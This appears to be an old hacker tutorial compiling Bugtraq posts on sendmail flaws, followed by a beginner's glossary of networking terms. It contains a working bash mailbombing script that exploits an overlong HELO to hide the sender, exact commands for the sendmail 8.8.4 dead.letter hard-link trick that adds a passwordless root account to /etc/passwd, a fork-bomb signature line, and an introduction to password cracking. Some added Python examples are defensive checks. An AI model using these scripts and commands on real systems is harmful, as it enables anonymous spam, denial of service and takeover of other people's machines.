From: Michał Szymański
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail

Hi folks,

This local queue filling DoS attack in sendmail is quite dangerous. But good security policy (like mine) will prevent attackers from doing such things. Control files (in /var/spool/mqueue) created by 'sendmail -t' are owned by root.attacker's_group; turn on quotas for group 'attacker's_group' on the file system containing the /var/spool/mqueue directory, and your host will not be vulnerable; but you _have to_ configure your sendmail as a _nosuid_ daemon;

Much more dangerous are remote queue filling DoS attacks. If you have enabled relaying, you can use the smdos.c proggie shown below; it will quite quickly fill up the partition on disk where /var/spool/mqueue resides. You should notice increased LA during the attack; in contrast to local DoS attacks, control files created by smdos.c are owned by root.root, so ... it's much more difficult to prevent offenders from doing it;

don't forget to change the BSIZE definition (in smdos.c) to the appropriate victim's host message size limitation (MaxMessageSize option); you can also increase the MAXCONN definition. smdos.c:
-----CUT FROM TEXT BOX-----
-----CUT HERE-----
Bug in Sendmail's HELO Command (taken from rootshell.com)
******************************

Note: this won't get you root access(14) or get you into parts of a system you're not supposed to get into, but this is still pretty cool. In fact, it lets you hide your IP/hostname when faking mail (more precisely, it pushes them out of the Received: header; the server's own log still has them)!

[ http://www.rootshell.com/ ]

We've had this exploit since January but sat on it until everyone had a chance of implementing a stable version of sendmail 8.9.x. (And because the last thing I want to do is help the spammers) It has now made its way to Bugtraq so without further ado.

--Rootshell
5/28/98
Date: Fri, 22 May 1998 12:36:54 +0300
From: Valentin Pavlov
Subject: about sendmail 8.8.8 HELO hole

I assume this is pretty old (10 Jan 1998) but still... I found a pretty simple way to prevent the hiding of the sender's IP address. The method to hide the IP address of the sender is described below. Now, if we want to keep track of such exploit attempts, we have to compile sendmail 8.8.8 with PICKY_HELO_CHECK defined in conf.h:

#define PICKY_HELO_CHECK 1

This will force sendmail to syslog an authentication warning (message with LOG_INFO level) and include an X-Authentication-Warning: header in the message, saying what host tried to hide itself. Check out the source (srvrsmtp.c, main.c). Also, LogLevel must be set to a value higher than 3 (default is 9) in sendmail.cf.

regards, capone

-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Make source, not [high]score
----------------------------
Valentin 'Val Capone' Pavlov
----------------------------
capone@netbg.com, UKTC87203
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Now for the original message, describing the exploit:

-----Original Message-----
From: Michał Zalewski
To: info@rootshell.com
Date: 10 January 1998 12:28
Subject: Sendmail 8.8.8 (qmail?) HELO hole.

Here's a brief description of a Sendmail (qmail) hole I found recently: When someone mailbombs you, or tries to send fakemail, spam, etc - sendmail normally attaches the sender's host name and its address to the outgoing message:

--
>From spam@flooders.net Mon Jan 5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
        by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
        for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!!
--

That's perfect - now you know who is responsible for that annoying junk in your mailbox: "Received: from spammer (marc@math.university.edu [150.129.84.5])". Nothing easier... But I found a small hole, which allows a user to hide his identity, and send mails anonymously. The only thing you should do is to pass a HELO string longer than approx. 1024 B - the sender's location and other very useful information will be cropped!!! Message headers should become uninteresting. Sometimes, the sender may become quite untraceable (but not always, if it's possible to obtain logs from the machine which has been used to send):

--
>From spam@flooders.net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>

MAILBOOM!!!
Now guess who I am...
--

Here's a simple example of the Sendmail HELO hole's usage. Note, this script has been written ONLY to show how easy sending fakemails, mailbombs, may be with the cooperation of Sendmail ;) The script is very slow and restricted in many ways, but explains the problem well (note, some non-Berkeley daemons are also affected, probably Qmail?):
-- EXPLOIT CODE --
#!/bin/bash
# SafeBomb 1.02b -- sendmail HELO hole usage example (Michal Zalewski).
# Re-flowed from the extracted text.  The original repeated a literal
# "__safebomb__" token until the HELO argument was longer than ~1024 bytes;
# that line did not survive extraction, so the same overlong argument is
# built in a loop below.
TMPDIR=/tmp/`whoami`
PLIK=$TMPDIR/.safe
TIMEOUT=2
LIMIT=10
MAX=20

echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo

if [ "$4" = "" ]; then
  echo "USAGE: $0 msgfile address server sender"
  echo
  echo "  msgfile - file to send as a message body"
  echo "  address - address of lucky recipient"
  echo "  server  - outgoing smtp server w/sendmail"
  echo "  sender  - introduce yourself"
  echo
  echo "WARNING: For educational use ONLY. Mailbombing is illegal."
  echo "Think twice BEFORE you use this program in any way. Also,"
  echo "I've never said this program is 100% safe nor bug-free."
  echo
  sleep 1
  exit 0
fi

if [ ! -f $1 ]; then
  echo "Message file not found."
  echo
  exit 0
fi

# Build a HELO argument longer than the ~1024 bytes the report names.
HELOSTR=""
while [ ${#HELOSTR} -le 1100 ]; do
  HELOSTR="${HELOSTR}__safebomb__"
done

# $PLIK becomes a tiny script that prints one SMTP session; it is piped into telnet.
echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo $HELOSTR\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=0

while [ -f $1 ]; do
  $PLIK|telnet $3 25 &>/dev/null &
  let SENT=SENT+1
  echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
  # Throttle: wait while LIMIT or more telnet sessions are still open
  # (the count is re-read on every pass, or the loop could never end).
  CONNECTED=`ps|grep -c "telnet $3"`
  while [ "$LIMIT" -le "$CONNECTED" ]; do
    sleep 1
    CONNECTED=`ps|grep -c "telnet $3"`
  done
  if [ "$SENT" -ge "$MAX" ]; then
    echo "It's just an example, sorry."
    echo
    exit 0
  fi
done
-- EOF --
Suggested fix: insert an additional length limit into the HELO/EHLO
parameter scanning routine OR disable AllowBogusHELO (but it may cause
serious trouble). I have no 8.8.8 sources at the time, so excuse me if
it's unclear.
PS:
--
From: Gregory Neil Shapiro

I was able to reproduce the header problem by lengthening the HELO string
in your script.
[...]
This will be fixed in sendmail 8.9.
--
_____________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
To iterate is human, to recurse divine [P. Deutsch]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
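The defender's side of the HELO hole, as an added example that is not Zalewski's code or Sendmail's: a HELO/EHLO argument check that enforces the 1024-byte limit named in the post, and a Received: trace line that keeps the peer's socket address after the client-supplied name so an overlong HELO cannot crop it. The function names and the RFC 5321 domain syntax rules are my assumptions, not anything from the post.

```python
"""HELO/EHLO argument checks for an SMTP receiver (added example)."""
import re

HELO_MAX_BYTES = 1024  # limit taken from the post above

# RFC 5321 4.1.2: Domain = sub-domain *("." sub-domain); labels are
# letters, digits and hyphens, not starting or ending with a hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_DOMAIN_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")
# Address literal in the IPv4 form only, e.g. [192.0.2.1].
_IPV4_LITERAL_RE = re.compile(r"^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$")


def check_helo_argument(arg, max_bytes=HELO_MAX_BYTES):
    """Return (accept, reply) for the text after HELO/EHLO.

    The length check runs first so that nothing downstream (regexes,
    logging, header construction) ever handles an oversized value.
    """
    if not arg:
        return False, "501 HELO/EHLO requires a domain"
    if len(arg.encode("utf-8")) > max_bytes:
        return False, "501 HELO/EHLO argument longer than %d bytes" % max_bytes
    if not arg.isascii():
        return False, "501 non-ASCII characters in domain"
    m = _IPV4_LITERAL_RE.match(arg)
    if m:
        if all(0 <= int(octet) <= 255 for octet in m.groups()):
            return True, "250 address literal accepted"
        return False, "501 invalid address literal"
    if len(arg) <= 255 and _DOMAIN_RE.match(arg):
        return True, "250 domain accepted"
    return False, "501 syntactically invalid domain"


def smtp_reply(line):
    """Reply to one command line; only HELO and EHLO are handled here."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    if verb.upper() not in ("HELO", "EHLO"):
        return "500 command unrecognized"
    accepted, reply = check_helo_argument(arg.strip())
    return "250 Hello %s" % arg.strip() if accepted else reply


def build_received_header(peer_ip, helo, my_host, max_helo_shown=64):
    """Trace line in which the peer address cannot be pushed out.

    The HELO name is client-controlled and is shown truncated; the address
    in brackets comes from the socket and is appended after it. That is the
    information the post says gets cropped when the HELO string is huge.
    """
    shown = helo if len(helo) <= max_helo_shown else helo[:max_helo_shown] + "..."
    return "Received: from %s ([%s]) by %s with SMTP" % (shown, peer_ip, my_host)
```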
Giant Bug in Sendmail 8.8.4 (taken from hackersclub.com)
--------------------------------------------------------
***************************
sendmail 8.8.4 exploit
"sendmail? 'tis the buggiest program" -phriend-
Ok, here's a brief and interesting explanation of this famous exploit.
This exploit uses sendmail version 8.8.4 and it requires that you have a
shell account on the server in question. The exploit creates a link from
/etc/passwd to /var/tmp/dead.letter. Very simple really. Here's how it
works; below are the exact commands as you have to type them (for the
technically challenged ones):
* ln /etc/passwd /var/tmp/dead.letter
* telnet target.host 25
* mail from: nonexsistent@not.an.actual.host.com
* rcpt to: nonexsistent@not.as.actual.host.com
* data
* lord::0:0:leet shit:/root:/bin/bash
* .
* quit
Kaboom, you're done. Telnet to port 23 and log in as lord, no password
required. Thanx to a little bit of work we did, lord just happens to have
the same privileges as root.
There are a couple of reasons why this might not work.
1. /var and / are different partitions (as you already know, you can't
make hard links between different partitions)
2. There is a postmaster account on the machine or a mail alias, in which
case your mail will end up there instead of being written to /etc/passwd
3. /var/tmp doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu
Editor's notes: lord::0:0:leet shit:/root:/bin/bash is a line out of a
Unix password file(33).
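An added example (not the hackersclub.com text's code, nor Sendmail's) that checks a host for the conditions the dead.letter trick needs, following the three "why this might not work" reasons above: same filesystem as /etc/passwd, a publicly writable directory, and an entry there that is a second name for the passwd inode. The function names are mine; demo() runs everything on a constructed temporary tree, never on the live /etc/passwd.

```python
"""Checks for the hard-link conditions behind the dead.letter bug (added example)."""
import os
import stat
import tempfile


def shares_filesystem(dir_path, sensitive_file):
    """Reason 1 above: hard links cannot cross filesystems."""
    return os.stat(dir_path).st_dev == os.stat(sensitive_file).st_dev


def is_world_writable(dir_path):
    """Reason 3 above: the trick needs a publicly writable directory."""
    return bool(os.stat(dir_path).st_mode & stat.S_IWOTH)


def find_hard_links(dir_path, sensitive_files):
    """Return (entry_path, sensitive_file) for entries that share an inode.

    lstat is used on purpose: a symlink to /etc/passwd has its own inode and
    would not make Sendmail write into the real file, so it must not be
    reported as a hard link.
    """
    targets = {}
    for path in sensitive_files:
        st = os.stat(path)
        targets[(st.st_dev, st.st_ino)] = path
    hits = []
    for name in sorted(os.listdir(dir_path)):
        full = os.path.join(dir_path, name)
        st = os.lstat(full)
        key = (st.st_dev, st.st_ino)
        if stat.S_ISREG(st.st_mode) and key in targets:
            hits.append((full, targets[key]))
    return hits


def extra_names(sensitive_file):
    """A link count above 1 means the file has another name somewhere."""
    return os.stat(sensitive_file).st_nlink - 1


def demo():
    """Constructed scenario: a fake passwd file plus a dead.letter linked to it."""
    with tempfile.TemporaryDirectory() as root:
        etc = os.path.join(root, "etc")
        var_tmp = os.path.join(root, "var", "tmp")
        os.makedirs(etc)
        os.makedirs(var_tmp)
        passwd = os.path.join(etc, "passwd")
        with open(passwd, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed content
        os.link(passwd, os.path.join(var_tmp, "dead.letter"))  # the aliasing
        os.symlink(passwd, os.path.join(var_tmp, "just-a-symlink"))  # must be ignored
        os.chmod(var_tmp, 0o1777)  # world-writable, like a public /var/tmp
        hits = find_hard_links(var_tmp, [passwd])
        return {
            "same_fs": shares_filesystem(var_tmp, passwd),
            "world_writable": is_world_writable(var_tmp),
            "extra_names": extra_names(passwd),
            "hits": [os.path.basename(entry) for entry, _ in hits],
        }
```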
Final Notes
-----------
You must have noticed that I didn't put anything from BugTraq here. This
is because everything that goes to BugTraq gets at least one reply (from
my experience), and I don't feel like posting whole threads(34) here
(they're too damn long).

Newbies corner
==============
1. Daemon - a program that listens for incoming connections on a specific
port(2). Some daemons may receive commands from you and interact with
you; others may simply spew out some text/binary and quit.

2. Port - (for a more technical explanation of what ports are, see the
end of this item) ports are like holes that enable things (data, in this
case) to come in. There are physical ports and software ports on your
computer. Physical ports are those slots on the back of your computer,
your monitor etc'. Software ports are used when connecting to other
computers. For example: I just bought a new computer and I want to turn
it into a webserver (I want to enable people to access selected web
pages, pictures, CGI and Java scripts or applets, programs etc' that are
located on my computer (MY computer, not some cheesy free webhost such as
Geocities), and I want those people to be able to do that using nothing
but a browser). In order for that to happen, I need to install a
webserver program. The webserver program opens a port on my computer
called port 80 (this number can be changed, but this is the default
number). Then it listens for incoming connections on that port. When
someone starts his Internet browser (Netscape, Lynx, Microsoft Explorer
etc') and surfs to my website, his browser connects to my computer on
port 80 and then sends HTTP commands that my webserver program can
understand. My webserver program quickly picks up the incoming data and
then sends its reply back to a port that the surfer's browser opened on
the surfer's computer. The browser listens on that port and waits for the
data (the HTML page, the picture, the program etc') to come in through
it.

Note about non-default ports: if you decide to put, say, a webserver on a
non-default port, it'll be harder for people to get in. If you decided to
put it on port... umm... 8000 instead of 80, people will have to type in
your IP address(9) or your hostname(10) if you have one and add a :8000
at the end. For example: 142.30.5.79:8080. Simply typing 142.30.5.79 into
your browser's URL field is the same as typing 142.30.5.79:80, so it's
best to put a webserver on port 80 (unless you only want a specific group
of people, who will be given that number, to access your webserver, but
such a blockage can be easily cracked using a portscanner(12)). There are
different ports for different services(3) so data won't mix up. Imagine
your browser getting data your FTP client was supposed to get. I hope you
got the main idea of what a port is.

Now, there are three kinds of ports: well-known ports, registered ports
and dynamic/private ports. The well-known ports are those from 0 through
1023. These are default ports for several services. For example: the
default port for webservers is 80. Otherwise, how would your browser know
which port it has to access? The registered ports are those from 1024
through 49151. These ports are reserved for several programs. For
example: ICQ (www.icq.com) reserves several ports for listening to
various incoming events (messages, file transfers etc'). The dynamic
and/or private ports are those from 49152 through 65535, and can be used
by anyone for any given purpose.

Important note about well-known ports: services(3) on these ports can
only be run by root, so inferior users won't start messing up important
ports.
3. Service - a daemon(1) that allows everyone who connects to it (or a
specific group of people, for example anyone from this IP(9) range,
everyone who knows the secret password etc') to use some kind of service.
For example: a webserver such as the one described in item 2 of this
chapter (the explanation regarding what a port is) is a service because
it allows people to come in and ask for certain pieces of data. The
simplest example of a service I can think of is "daytime". Daytime waits
for incoming connections on port(2) 13 and when someone comes by it
immediately announces the current time on the computer that runs it (with
no need for you to type in any commands or passwords or anything).
Simple.
4. Daemon banner - most daemons(1) give away some technical info to
anyone who connects to them at some point. This information can be used
by anyone who connects to that daemon simply to know how best to interact
with the daemon (which daemon is it, what version, etc'), but it can also
be used by hackers. Let's try connecting to port(2) 23 on someone.com
(note: I've made up this hostname(10) and all the details regarding it
simply to teach you about daemon banners. I really don't know whether
there is such a hostname and whether the details I'm about to give you
are correct). On port 23 you would usually find Telnet(19). Telnet is a
service which in most cases first asks you for a username and a password
(unless you typed in an "unpassworded" username, in which case it will
simply log you in as that user without asking for a password) and then
runs a program specified by the sysadmin(22) and lets you work with it.
In most cases you will get into a text-based shell (a command
interpreter(20)). The problem is: you cannot just do ANYTHING. It all
depends on what kinds of permissions the user that you are logged in as
has. The user root(14) has all permissions (read everything, write (and
delete) everything, execute everything and change other people's
permissions).

Okay, so let's try going to port 23 on someone.com. At first we get
this:

Welcome to someone.com, running FreeBSD 4.13
Login:

Aha! Someone.com is running an operating system called FreeBSD 4.13! That
has to be worth something (we might come across a bug report regarding a
bug that exists on FreeBSD 4.13 and might enable us to hack this server
at a certain point). Every piece of information about a server is
important. Now, since we don't know a username and a password for this
server we could either terminate the connection or try guessing. Most
servers have a guest account (username: guest, password: guest or just
username: guest) or a newuser account (username: newuser, password:
newuser, or just username: newuser), but that certainly won't help us
hack these guys... unless there's a major hole in these accounts. You'll
have to figure these things out by yourself.
Note about the word server: a computer is called a server if it offers
any services. If not, it is called a host.

5. Timeout - okay, so I've got a daemon(1) waiting on port(2) 23 for
incoming connections. Now, what happens if someone connects to it and
does absolutely nothing? He would simply remain connected to that daemon
until one of us either reboots or closes the connection. You don't want
anyone connecting to some port on your computer and just hanging there,
do you? This would only waste valuable bandwidth(15)! Most people will
not want to monitor their network status 24 hours a day and disconnect
everyone who decides to hang around for a while (especially on large
networks). This is why the timeout was invented. By setting a timeout
value for a daemon (this can be done during the setup process, by running
a setup program or by entering some sort of options box) you can make it
close the connection on anyone who connects to it and does nothing for
longer than the timeout value. For example: you put a daemon on port 17
and tell it to time out after 2.5 seconds. If someone connects to your
daemon and does not type anything for more than 2.5 seconds, the daemon
will close the connection and that person will have to reconnect and
start typing something before the daemon times out and throws him out.
This is why webservers have a short timeout of 2 seconds (most people
connect to webservers using client programs(16), and these programs
"type" really fast...).
6. TCP - stands for Transfer Control Protocol. TCP is a protocol that is
used for transferring data through networks (the Internet, local networks
etc'). TCP is much more reliable than UDP since it uses several
precautions, such as sequence numbers and all sorts of nifty header flags
(see the excellent article called 'IP Spoofing Demystified' in the Books
Section at http://blacksun.box.sk for lots of info regarding TCP (a real
MUST READ!!)). TCP's only disadvantage is that it is a bit slower than
UDP, but it is more reliable, hence it is used to transfer sensitive
files (such as programs - if you lose a single bit of the file, the whole
thing is useless).
7. UDP - stands for User Datagram Protocol. UDP is a protocol that is
used for transferring data through networks (the Internet, local networks
etc'). UDP is less reliable than TCP (see the excellent article called
'IP Spoofing Demystified' in the Books Section at http://blacksun.box.sk
for lots of info regarding UDP (a real MUST READ!!)), but it is also a
little faster, hence programs such as Real Player (see
http://www.real.com) use it for streaming video and more, where losing a
single packet(32) or two is not such a big deal.
8. ICMP - stands for Internet Control Message Protocol. A protocol used
for transferring error messages over a network (the Internet, local
networks etc').
9. IP address - every computer connected to the Internet has an IP
address. If another computer wants to interact with your computer it
will need your IP, just like you need another person's phone number to
call him. IP addresses look like this: x.x.x.x, where x can be a number
between 0 and 255. Note: there are "special" IP addresses which aren't
used to connect to other computers. For example: 127.0.0.1 means
localhost, which means you (your computer). Connecting to a certain
port(2) on the IP 127.0.0.1 will connect to that port on your own
computer. Oh, by the way, IP stands for Internet Protocol(18).
10. Hostname - hey, guess what! I just found this really cool site! But I
can't remember its IP address, and even when I do, I hate typing in these
long IP addresses(9). Sure, I can bookmark it, but what if I want to tell
my friends about it? Or what if I'm surfing from my friend's house or
from a public place and I don't have my bookmarks? The answer to all of
these questions is hostnames. Hostnames are aliases to IP addresses. A
list of hostnames and their IP addresses is located at InterNIC, which is
a database of all hostnames and their IP addresses. When you type in a
hostname, your computer will look up that hostname, find the appropriate
IP address and then connect to it. But imagine that the entire world
connected to InterNIC for every lookup: this would surely overload their
servers, they would have to spend money on constant upgrades and backups,
and think what would happen if something bad happened to their
databases... The solution for this problem is called DNS servers(17).
11. Finding out what your ISP's mail servers are - there are several ways
to do this:
1) Call your ISP and ask them what the IP address(9) or the hostname(10)
of your outgoing mail server is (this is the IP/hostname you will need to
perform all the tricks in this tutorial). If you want to know a different
ISP's mail server, call their tech support phone number. But what if
they're on the other side of the world and you don't feel like spending
tons of cash simply for calling them and being put on hold? In this
case, try method 3.
2) Start up your mail client, go to your preferences page and find what
it says in the 'outgoing mail' field or in the 'SMTP server' field (both
are the same. SMTP stands for Simple Mail Transfer Protocol, which is a
protocol(18) that is used to send Emails over the Internet).
3) Guessing. If your target server is someone.com, their mail server
should either be mailgw.someone.com:25 (mailgw.someone.com on port(2) 25.
Note: mailgw stands for mail gateway) or someone.com:25. If not, send an
Email to admin@someone.com or support@someone.com and ask them what their
mail server is (they should be happy to answer you, unless you tell them
that you're an evil hacker or something. In that case they'll call the
cops on you). Note: not every server on the planet has an outgoing mail
server.
12. Portscanner - a program that scans a target for open ports(2) by
trying to connect to it on various ports. The simplest portscanner starts
at port 1 and climbs up, but you can tell more advanced portscanners to
scan a specific range, give you some info on open ports they might find
etc'.

13. Services scanner - a services scanner is much more sophisticated than
a portscanner(12) since it tries to connect on predefined ports which
should have the service(3) you're looking for on them.

14. Root - an account on Unix computers which has maximum privileges
(read any file, write (and delete) any file, execute any file and change
other users' permissions). Note: other accounts may have root access, and
the root account may not always have root access, depending on the
sysadmin(22) (but root is the default account for root access).

15. Bandwidth - the total amount of speed a network connection device (a
modem, a network card, a mail pigeon etc') can get to. For example: I
just bought a new modem. It has a bandwidth of 100Ks per second, meaning
it can transfer up to 100Ks per second. When you use your network device
to do something it will drain some of the bandwidth in order to do this
operation.
16. Client program - a program that connects to a certain service(3).
Most client programs know how to communicate with that service with or
without the information they receive from the daemon banner(4). Example:
an Internet browser (such as Netscape) is a client program because it
connects to port(2) 80, where the webserver daemon(1) is waiting for
connections, and interacts with it in order to retrieve the file you're
looking for. A browser has to know how to communicate with the webserver
daemon (also referred to as HTTPD, HTTP Daemon. HTTP stands for Hyper
Text(23) Transfer Protocol) in order to fulfill your requests.

17. DNS server - a server that stores hostnames(10) and their IP
addresses(9). Instead of having InterNIC's servers handle the entire
planet, every ISP has a DNS server. When you type in a hostname and tell
your modem to connect to it, your computer will perform an action called
'DNS Lookup'. In other words, it will ask your ISP's DNS server what the
appropriate IP address for the hostname you've typed in is. If your ISP's
DNS server does not know the answer, it will ask a higher-level DNS
server. If the higher-level DNS server does not know the answer, it will
ask an even higher-level DNS server, etc' etc' etc'. The highest level is
InterNIC itself. If the DNS server knew the IP in the first place it
would give it to you. If it didn't (and it only found it out after
querying other servers), it will first add it to its own database and
then give it to you.
18. Protocol - a set of rules used for computers to interact with each
other over a network of some sort (such as the Internet or some kind of
local network). They need to know a common protocol, and each computer
has to assume that the other one knows this protocol and uses it.

19. Telnet - a program that, at its simplest, allows you to form a
text-based connection between your computer and another computer over a
network of some sort. You may choose the IP address(9) or hostname(10)
and the port(2) you wish to contact, and Telnet will establish a TCP(6)
connection between both machines. Note about the Telnet daemon(1): the
Telnet daemon is completely different. It waits for incoming TCP(6) or
UDP(7) connections on port 23 and then asks the user for a login (often
called a username) and a password (unless the user typed in an
unpassworded username. In that case, he will get in without entering a
password. Unpassworded accounts are often VERY limited) and then proceeds
to execute a program (usually a command interpreter(20)) and give you
some permissions, all depending on the username and the password you
have entered (unless you gave the wrong details. In that case, you will
be told that either the username or the password is wrong and be given
another try. Most systems give you three tries and then quit).
20. Command interpreter - a program that accepts commands from the user
and turns them into real commands your computer understands. For
example: if your command interpreter contains a command called, say,
display, which accepts a single parameter which should be a filename, and
you type in 'display somefile' (without the quotes, and replacing
somefile with a real filename) then it will translate this command into
'okay mr. computer, find the hard drive by doing this and this, go to the
FAT (File Allocation Table) and find out in which sector/sectors this
file is located, grab the file and send it to the terminal device (the
specified output device, usually your monitor)'. Get the main idea?

21. Shell account - an account on a remote computer (a username and a
password and a bunch of personal configuration files and stuff). Having
a shell account on a remote computer means having the ability to
telnet(19) into that computer on port 23, type in your account's login
(also referred to as a username) and password and get a command
interpreter(20) with some permissions (depending on the sysadmin(22)).

22. Sysadmin / admin - the man/woman/furry creature who is in charge of a
system.
23. Hyper Text - if you've ever seen an HTML document you should know
what hyper text is, but you might not be aware of it. HTML stands for
Hyper Text Markup Language. Hyper text is considered "enhanced text",
since you can add pictures, colors, links etc' to it. Compare that to the
regular and dull text format which this tutorial uses... :D

24. RFC - stands for Request For Comments. These are draft papers by the
IETF (Internet Engineering Task Force - those guys who set all those
Internet standards and stuff). They contain suggestions for Internet
standards. You can search for RFCs at http://www.linuxberg.com.

25. InterNIC - the domain registration database and the highest DNS(17)
server on the planet.

26. Sub domain - first class domains look like this: something.com (or
other extensions, such as org, net, cc, co.uk etc'). It costs 70$ to
register one (see http://www.networksolutions.com). Second class domains
look like this: someone.something.com and they cost 0$ to register, if
you already have something.com registered to you, of course (although
you can get those for free on websites such as www.anrki.com). Third
class domains look like this: blah.someone.something.com and they don't
cost any money either, etc' etc' etc'. Note about the price of a
first-class domain: this price does not include web hosting (someone who
will host your website or whatever you want to put up on his server).
27. SSH - stands for Secure Shell. This daemon(1) waits for incoming
TCP(6) or UDP(7) connections on port 22. Once you connect to it, you will
be asked for a login and a password, just like the Telnet daemon(19)
does, only SSH encrypts everything for increased security.

28. Moderated mailing list / message board - I'll explain this by giving
you an example. BugTraq (see http://www.securityfocus.com) is one of the
best security-related mailing lists. Although people can "send things to
the list" (meaning send an Email message and have it sent to all the
members of the mailing list), you can't just send anything. Aleph1, the
moderator, goes through all incoming messages and posts only the good
ones. The same goes for moderated message boards, etc'.
29. DoS attack - DoS stands for Denial of Service (also referred to as a
"nuke" or a "newk"). A DoS attack is some kind of attack that causes the
target computer to deny some/all kinds of services to the users of that
computer (local and/or remote users). For example: Winnuke (also known as
OOB), the simplest DoS in the world. (Taken from Spikeman's DoS site)

This denial of service program affects Windows clients by sending an "Out
of Band" exception message to port 139, which does not know how to handle
it. This is a standard listening port on Windows operating systems. Users
of Win 3.11, Win95, and Win NT are vulnerable to this attack. This
program is basically a nuisance program, but it is being widely
circulated over the internet now. It has become a bother in chatrooms and
on IRC. By using your IP# and sending OOB data to port 139, malicious
users can disconnect you from the net, often leaving you with low
resources and the blue tinted screen. Some of you may have been victims
already. If this happens to you on Win 95, you will see a Windows fatal
error message similar to the following:

Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE. This was called
from 0028: in VxD NDIS(01) + 00000D7C.

Rebooting the comp should return it to normal state.

Patches ("fixes") For WinNuke (OOB)
-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=
Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp

Windows 95 Patches
http://support.microsoft.com/download/support/mslfiles/Vipup11.exe
http://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*)
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to 95 patches before installing.

Which version of Winsock do you have on your Windows 95 PC?
http://premium.microsoft.com/support/kb/articles/Q177/7/19.asp
http://www.theargon.com/defense/nuke/index.html

Windows NT 4.0 Patch
http://support.microsoft.com/support/kb/articles/Q143/4/78.asp
http://www.theargon.com/defense/nuke/index.html
Please read notes referring to Windows NT patches before installing.

More info on DoS attacks can be found at Spikeman's DoS site:
http://www.genocide2600.com/~spikeman/main.html

* I really don't know if this patch will work on newer versions of
Winsock. Therefore I'd like to recommend that you first downgrade to
Winsock 1.1 (the one that comes with Windows 95) by going to Control
Panel, Network and removing TCP/IP and Dial Up Adapter(30) and then
re-adding them by clicking Add, choosing Protocol and in the company
frame choosing Microsoft. Then look for an option called TCP/IP and
double-click it. As for DUN (Dial Up Networking), do the same but choose
Adapter instead of Protocol. After you finish downgrading, re-upgrade to
Winsock 2.0, apply the patch (Vipup20.exe) and then upgrade to newer
versions of Winsock.
30. DUN - stands for Dial Up Networking. DUN is the program that comes
with Windows and dials to your ISP in case you have a dial-up
account(31).

31. Dial-Up account - a dial-up account at an ISP means that your modem
has to dial some phone number before you can get on the net. Unlike other
ISP accounts (direct cables which keep you online 24 hours a day), you
get a dynamic IP address(9) (and not a static one like on direct cable
connections) since you have to connect and disconnect instead of just
staying online all the time. Every time you re-connect you are assigned a
different IP address.

32. Packet - a piece of data that travels over a network (such as the
Internet or local/wide area networks). A packet consists of two main
parts: the header and the data itself. The header contains all sorts of
nifty values such as the TTL (Time To Live) and more (you can read about
those in the Modem Speedup section at http://blacksun.box.sk). The data
part contains the actual data that the packet is carrying. On a regular
dial-up account(31), the size of a packet should be 576 bytes (including
the header), but on direct cable connections a packet would be much
bigger (again, see the Modem Speedup section at blacksun.box.sk).
33. Unix password files - every Unix system has a password file. It
contains a list of users, their passwords and some important information
about them. The password file is located at /etc/passwd. Each line
represents a user. Each line consists of 7 fields, separated by : marks
(colons). A line in a password file should look like this:

Username:encrypted password:UID:GID:short description:home directory:shell

Username - the user's username.
Encrypted password - the user's password (encrypted for higher security).
An encrypted password is always 13 characters long.
UID - User ID. Each user has an ID number. If your UID is 0 it means you
have root access(14).
GID - Group ID. You can set groups (for example: all the workers in the
accounting division) and set special permissions for that entire group.
Root has GID 0.
Short description - a short description in human language.
Home directory - the directory where all of the user's personal
configuration files are held.
Shell - a program that is executed once the user logs in. In most cases
(and in this case too) the shell is a command interpreter(20).

In our case, the encrypted password field is empty, which means that the
user gets to log in by simply giving a username. This can be changed
after we log in by typing passwd at the command interpreter. You will
then be asked for a password to be set for your account. Note: on some
systems, you have to type passwd your-username instead of simply typing
passwd. Note 2: root can do passwd your-username and change
your-username's password, no matter who your-username is. Note 3: if you
put any characters that are not from the following sets: '. / 0-9 a-z
A-Z' (without the quotes) or if you don't put anything in, the account is
disabled so that user cannot log in. This is used when you know you might
want to enable this account in the future.

Cracking the encrypted password
<><><><><><><><><><><><><><><><
For this you need a password cracker. A password cracker is a program
that takes a certain word out of a dictionary file (also referred to as a
"wordlist") or a combination of letters, numbers etc' that the program
makes up systematically ("brute-force cracking"), encrypts it the way
